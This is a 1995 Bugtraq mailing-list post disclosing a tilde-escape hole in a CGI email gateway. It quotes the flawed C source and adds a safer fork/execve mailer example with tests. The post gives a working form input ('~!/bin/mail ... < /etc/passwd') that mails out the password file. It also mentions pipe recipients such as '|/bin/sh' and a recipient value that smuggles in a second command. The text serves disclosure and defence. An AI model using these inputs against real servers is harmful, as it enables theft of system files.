[2082] in bugtraq
More holes, was: Re: SECURITY HOLE: FormMail
daemon@ATHENA.MIT.EDU (Ivo)
Sat Aug 5 14:24:56 1995
Date: Sat, 5 Aug 1995 13:53:21 +0200
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Ivo <ivo@nijenrode.nl>
X-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: Your message of "Fri, 04 Aug 1995 16:44:05 PDT."
<199508042344.QAA20408@Csli.Stanford.EDU>
In message <199508042344.QAA20408@Csli.Stanford.EDU> Christian Wettergren writes:
>| Just to be helpful, the way to do it more safely, without massive
>| need for checking is to build a complete mail message, including
>| header, and hand that to "sendmail -t" which then reads the recipient
>| information out of the constructed header. [Sendmail should of course
>| be an invocation of smail or pp, not the BSD program of that name,
>| given the history of problems that has had]
>
>I suspect this still wont take care of emails to pipes or files,
>i.e <|/bin/sh> or </.rhosts>, it is a legitimate, albeit unexpected,
>mail-command going to sendmail. So unless these two mode are totally
>stripped out of the sendmail, there will exist a vulnerability there,
>wont it?
I've written an email-cgi package myself, and for this package I've used
a simple smtp client written by Wietse Venema. I've been familiar with bugs
like tilde-escapes etc. for a while, and this smtp client does not have
any fancy switches, escapes, options etc.
Ok, of course you should not use popen() or system() (C) or open/system (perl)
(at least not without filtering out '|;' etc), but fork combined with
execve works fine and is secure.
You can find smtp.c in the wwwutils package at
ftp://ftp.win.tue.nl/pub/infosystems/www/wwwutils.tar.gz
or directly at
ftp://ftp.nijenrode.nl/pub/people/ivo/smtp.c
Also (perhaps someone already reported this), Thomas Boutell's Email Handler
(http://siva.cshl.org/email/index.html)
seems to suffer from this problem. I reported this to him a very long time ago,
but it seems he hasn't fixed it. Thomas Boutell is maintainer of
the WWW-FAQ, and he refers to his handler in it, so it *might* be that
a lot of people are using it! Here's a piece of code from email.c:
sprintf(buf, "/usr/bin/mail %s", entries[recipientid].val); /* recipient was checked against a list, see below */
out = popen(buf, "w");
fprintf(out, "Subject: %s\n", entries[subjectid].val);
fprintf(out, "Reply-To: %s\n", entries[emailid].val);
fprintf(out, "Supposedly-From: %s\n", entries[nameid].val);
fprintf(out, "[This message was sent through the www-email gateway.]\n");
fprintf(out, "--\n");
fprintf(out, "%s\n", entries[contentid].val); /* raw form body, handed to mail(1) unfiltered, ~-escapes included */
pclose(out);
The popen() here doesn't seem to be insecure, the cgi first checks the
recipient against a list of users which are defined in a local configfile
(whose location is hardcoded into the source).
However, this program directly sends the entire message to /usr/bin/mail,
including ~-escapes. I've been able to send myself, using this program,
a copy of the passwd file by simply typing
~!/bin/mail ivo@nijenrode.nl < /etc/passwd
in the message-entry of the form. This was on AIX 2.3.
Happy hacking,
Ivo
------------------------------------------------------------------------
Name: Ivo van der Wijk | It won't give up it wants me dead
Internet: ivo@nijenrode.nl | this goddamn noise inside my head
Aka: www@nijenrode.nl |
IRC: VladDrac | |\|||/|
URL: http://www.nijenrode.nl/~ivo
------------------------------------------------------------------------
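The safe pattern the post recommends, written out as an added example (this is not code from Ivo's post, from his wwwutils package, or from Boutell's email.c). It keeps user data out of any command line by building the whole message in memory and handing it over stdin to a child started with fork()+execve() and a fixed argv, matches the recipient exactly against an allowlist instead of filtering shell metacharacters, and rejects CR/LF in header values so a form field cannot smuggle in an extra "Bcc:" line, which is the pipe/file recipient the quoted reply is worried about with "sendmail -t". To run offline the mailer is /bin/cat (an assumption; in production it would be the plain SMTP client Ivo mentions, or "sendmail -t"), so the captured output is exactly the bytes the mailer received: the "~!/bin/mail ... < /etc/passwd" line arrives as inert body text. Note that this only helps if the program you exec treats stdin as data; exec'ing a mail(1) that honours ~-escapes would reintroduce the hole. The allowlist and all addresses are constructed.

```c
/* Added example, not code from Ivo's post or from Boutell's email.c. */
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed allowlist (assumption: a real gateway loads it from its config file). */
static const char *const allowed_recipients[] = {
    "webmaster@example.com", "ivo@example.com", NULL
};

/* Exact match, no filtering: "ivo@example.com; id" is simply not listed. */
int recipient_allowed(const char *addr)
{
    for (int i = 0; allowed_recipients[i] != NULL; i++)
        if (strcmp(addr, allowed_recipients[i]) == 0)
            return 1;
    return 0;
}

/* A header value must stay on one line: a CR or LF would let the user append
   a header of their own, e.g. "Bcc: |/bin/sh", for "sendmail -t" to act on. */
int header_value_ok(const char *v)
{
    return strpbrk(v, "\r\n") == NULL && strlen(v) < 256;
}

/* Build the whole message in memory. User data only ever becomes a header
   value or body bytes; it is never interpolated into a command line. */
int build_message(char *out, size_t cap, const char *to, const char *reply_to,
                  const char *name, const char *subject, const char *body)
{
    if (!recipient_allowed(to) || !header_value_ok(reply_to) ||
        !header_value_ok(name) || !header_value_ok(subject))
        return -1;
    int n = snprintf(out, cap,
                     "To: %s\nReply-To: %s\nSubject: %s\nX-Supposedly-From: %s\n\n"
                     "[This message was sent through the www-email gateway.]\n--\n%s\n",
                     to, reply_to, subject, name, body);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* fork()+execve() the mailer with a fixed argv and a minimal environment: no
   shell is involved, so nothing in argv or the message gets re-parsed. The
   message goes to the child's stdin; its stdout is captured into `out` so the
   caller can see what the mailer received. Returns the child's exit status or
   -1. The message is assumed to fit in the pipe buffer (true for a web form). */
int run_mailer(char *const argv[], const char *msg, size_t len, char *out, size_t cap)
{
    static char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int in[2], outp[2];
    if (pipe(in) < 0 || pipe(outp) < 0)
        return -1;
    signal(SIGPIPE, SIG_IGN);   /* a mailer that exits early must not kill us */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        dup2(in[0], STDIN_FILENO);
        dup2(outp[1], STDOUT_FILENO);
        close(in[0]); close(in[1]); close(outp[0]); close(outp[1]);
        execve(argv[0], argv, envp);
        _exit(127);
    }
    close(in[0]);
    close(outp[1]);
    for (size_t done = 0; done < len; ) {
        ssize_t w = write(in[1], msg + done, len - done);
        if (w <= 0) break;
        done += (size_t)w;
    }
    close(in[1]);
    size_t got = 0;
    for (ssize_t r; (r = read(outp[0], out + got, cap - 1 - got)) > 0; )
        got += (size_t)r;
    out[got] = '\0';
    close(outp[0]);
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The post's attack replayed through the safe path. The "mailer" is /bin/cat
   (assumption, so this runs offline); in production it would be a plain SMTP
   client or "sendmail -t", both of which treat stdin as data. */
int demo(const char *to, const char *body, char *out, size_t cap)
{
    char msg[4096];
    int n = build_message(msg, sizeof msg, to, "user@example.com", "A User", "test", body);
    if (n < 0)
        return -1;
    char *const argv[] = { "/bin/cat", NULL };
    return run_mailer(argv, msg, (size_t)n, out, cap);
}

int main(void)
{
    char out[4096];
    int rc = demo("ivo@example.com", "~!/bin/mail ivo@example.com < /etc/passwd", out, sizeof out);
    printf("exit=%d, mailer received:\n%s", rc, out);
    rc = demo("ivo@example.com; cat /etc/passwd", "hi", out, sizeof out);
    printf("hostile recipient: %s\n", rc < 0 ? "rejected before any process ran" : "accepted?!");
    return 0;
}
```

The point of capturing the child's stdout is that you can check, in a test, that the bytes reaching the mailer are exactly the message you built: the "~!" line is present verbatim and no shell ever had a chance to see the recipient string.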